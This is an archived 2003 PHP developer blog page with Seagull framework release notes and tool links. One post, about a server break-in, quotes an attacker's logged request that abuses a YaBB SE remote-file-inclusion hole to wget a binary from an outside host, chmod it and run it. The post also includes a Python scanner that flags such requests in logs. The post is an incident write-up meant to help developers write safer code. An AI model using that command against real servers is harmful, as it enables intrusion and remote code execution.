Archive | October, 2003

Holee Progress Bars !!

Posted on 31 October 2003 by Demian Turner

I don’t know what it is about a simple progress bar that can get one excited, but once you see what Laurent Laville has achieved in HTML with his PEAR class you’ll see what I mean.

Grab the class here, make sure to check out the examples here.

Comments (0)

Seagull 0.3.4-beta Released

Posted on 29 October 2003 by Demian Turner

Notable improvements:

  • Caching fully implemented on tabs and blocks, in some pages this amounts to a tenfold increase in speed – thanks to Andy Crain
  • Further security measures introduced
  • Install script can now be downloaded separately at SF – thanks to Thomas Moulard
  • bugfix now allows logging to DB target (Jan Tammen)

Quite a bit of activity on the SF mailing list, come and join us and lend a hand 🙂

Comments (0)

Posting Forms Securely

Posted on 29 October 2003 by Demian Turner

I’ve been having a two-year battle with a bank of mine in Spain trying to convince them to improve the security of their web authentication.  My beef was that the default logon form appears on a non-SSL page, and even though it gets posted to an SSL target, I thought the details were being passed in the clear.

When in doubt, post your query at Sitepoint 🙂  I had a lot of informative answers but what did it for me was downloading a free Windows packet-sniffer and checking out exactly what was going on.

I used something called etherdetect which you can also grab from tucows.  Aside from a few ‘trial version’ messages it really does a great job, and ‘playing’ with it is recommended for all web developers.

Anyways, it turned out I was wrong, more details of the discussion are over at this Sitepoint thread.

Comments (1)

Interesting Hacking Ideas

Posted on 28 October 2003 by Demian Turner

In recent months I’ve attracted the attentions of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn’t seem to be widely documented on the web.

Finally I managed to close the hole, but after I had tried all the following:

  • shutdown all non-essential services on RH 7.3
  • shutdown FTP
  • reset all passwords
  • removed GCC from my system as the hacker was gaining access and compiling further C exploits
  • almost having had to change machines!

I was still getting compromised.  At first I thought this bastard was just a bot that automatically detected a security hole and was sending automated attacks.  But recently, looking at his .bash_history, I realised I had a fairly persistent pest on my hands.

Anyways, the security hole ended up being quite simple, wish I had discovered it earlier.  Turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about.  I present the details here in the hope they will help some people write more secure scripts.

The request that the hacker was using to compromise the server was the following:

[root@www logs]# cat access_log | grep spc1
200.138.46.149 - - [25/Oct/2003:16:43:42 -0700] "GET /fishbowl/Sources/Packages.php?
sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;
%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1" 200
255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"

Put through a little urldecode you get:

/fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir
/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1

Check out the cat.txt, it’s an interesting idea.  Looks like the yabbse script presented a nice exec() or system() call for anyone to do what they wanted with.  I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, and that’s if they have no prior development experience.  What’s strange is that yabbse, currently in version 1.5.4 with quite a professional website, let this *censored*up slip through.
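As an added defender’s example (not code from the post or from the YaBB SE project), here is a small Python scanner that parses access_log lines in the format shown above, urldecodes each query parameter by hand, and flags the two things this request does: a script parameter carrying a remote URL, and a parameter carrying chained shell commands.  The sample log text (the quoted line re-typed on one line, plus one ordinary request), the heuristics and the alert labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: the access_log line quoted in the post (re-typed with ASCII
# quotes, unwrapped) plus one ordinary request for comparison.
SAMPLE_LOG = """\
200.138.46.149 - - [25/Oct/2003:16:43:42 -0700] "GET /fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1" 200 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
10.0.0.5 - - [25/Oct/2003:16:44:01 -0700] "GET /fishbowl/index.php?board=3 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
# Apache combined format: client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
URL_SCHEME = re.compile(r'^(?:https?|ftp)://', re.I)  # parameter value is itself a URL
SHELL_CHAIN = re.compile(r'[;|`]|\$\(')              # shell command separators
CMD_WORDS = re.compile(r'\b(wget|curl|chmod|mkdir|cd|sh|perl)\b')

def parse_query(query):
    # Split on '&' only and urldecode by hand, so ';' inside the cmd value survives.
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote_plus(key), unquote_plus(value)))
    return params

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status, _size = m.groups()
    parts = urlsplit(target)
    return {"client": client, "time": ts, "method": method, "path": parts.path,
            "params": parse_query(parts.query), "status": int(status)}

def classify(entry):
    # Heuristics for what the quoted request does: remote URL in a parameter,
    # and chained shell commands in another parameter.
    findings = []
    for key, value in entry["params"]:
        if URL_SCHEME.match(value):
            findings.append(f"remote-url-in-param:{key}")
        if SHELL_CHAIN.search(value) and CMD_WORDS.search(value):
            findings.append(f"shell-commands-in-param:{key}")
    return findings

def scan(log_text):
    # Return (client, path, findings) for every request that trips a heuristic.
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (findings := classify(entry)):
            alerts.append((entry["client"], entry["path"], findings))
    return alerts
```

Running scan(SAMPLE_LOG) reports only the first line, with both heuristics tripped; legitimate applications that pass URLs in parameters will need the first rule tuned per site.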

Many thanks to Nick Rembis who pointed me in the right direction to closing this hole.

Comments (2)

RegExpEditor: Regular Expression GUI Tool

Posted on 22 October 2003 by Demian Turner

Hone your regex skills with this utility that will make a welcome addition to any developer’s toolbox.  Thanks to the folks at PHPedit, the GUI app allows you to tweak your PCRE regular expressions with much less fuss than reloading browsers.

RegExpEditor, which is a free download, evaluates your expressions as you type, and has two minor but notable differences from how you would approach the preg_* family of functions in PHP:

  1. the beginning and ending forward slashes are implicit, don’t type them in
  2. enclose each match expression in (parentheses), even if it is only one

On a related note, be sure to check out Simon Willison’s interesting use of preg_replace_callback() – make sure you send an html string as arg to the function, at least something enclosed in one set of tags.

Or this use of create_function() for stripping selected tags from an html string.

Comments (0)

Seagull 0.3.3.p1-beta bugfix

Posted on 18 October 2003 by Demian Turner

To all who downloaded the Seagull 0.3.3 release, my apologies for a showstopper bug that crept in if you’re running less than PHP 4.3.x.

You can either download the patched release here or simply change the single problematic line of code as follows.  Edit the file:

seagull/lib/pear/HTML/Template/Flexy/Compiler/Standard/Functions.php

and move the following line from the handle method:

        $class = __CLASS__;

AFTER the if statement.

Thanks to Thomas Moulard for pointing out this doozie.

Comments (0)

Seagull 0.3.3-beta Released

Posted on 16 October 2003 by Demian Turner

PHPkitchen’s a bit quiet these days but the Seagull changelog is long 😉  Notable improvements include:

  • latest Flexy integrated which means no more PHP short tags, no need to use update.php script, and you can raise your error_reporting to E_ALL
  • simple IP blocker incorporated for banning IPs you blacklist (thanks to Thomas Moulard)
  • caching introduced with PEAR’s Cache_Lite which dramatically speeds up some pages, like articles.php (thanks to Andy Crain)
  • french translations done for all the modules (thanks to Thomas Moulard)
  • BC workarounds added for earlier PHP versions, works fine on my 4.2.2 and may work on 4.1.x

Download the latest here.  And join up with our new SourceForge mailing list.  The account only came through a couple of days ago but soon you will be able to use all the usual SF tools: bug tracker, CVS, task mgr, downloads.

The mailing list will now be the main place for developer contributions, news, requesting support, etc., superseding the forums which will be kept open for archives only.

Please read the changelog for details on how to work with the latest Flexy, and for a few outstanding issues.

Comments (0)

phpJobScheduler – easily schedule your PHP scripts to run hourly, daily or weekly

Posted on 14 October 2003 by Demian Turner

phpJobScheduler – Designed to automate tasks by scheduling PHP scripts to run at set intervals, a replacement for cron jobs on Unix or scheduled tasks using Microsoft Scheduler. phpJobScheduler is a scheduler that runs using PHP and MySQL (no root/admin access is required). IT’S FREE, full details at:

http://www.thedemosite.co.uk/phpjobscheduler/

Comments (1)

Seagull Process Flow in UML

Posted on 09 October 2003 by Demian Turner

Developer and pear-general regular Andy Crain recently attacked the Seagull app framework with a view to mapping out the process flow in UML.

The result is quite impressive, click here for the full-size sequence diagram (725 KB) – a great way to see at a glance what’s happening with the framework workflow.  You can also download the UML file for the Open Source UML CASE tool, Poseidon.

A big thanks to Andy and his impeccable patience and attention to detail 🙂

Seagull’s API docs were also updated yesterday, next is the overview documentation, I promise.

Comments (6)

PHP Programming Marathon

Posted on 09 October 2003 by Demian Turner

DotGeek.org is proud to announce the first ever PHP Programming Marathon. The Programming Marathon is a special competition which takes place online on a specific date and time. Great prizes are on offer, like the Elumix geek keyboard, Zend Studio and one-year free hosting packages.

Are you ready for the challenge?

Comments (0)
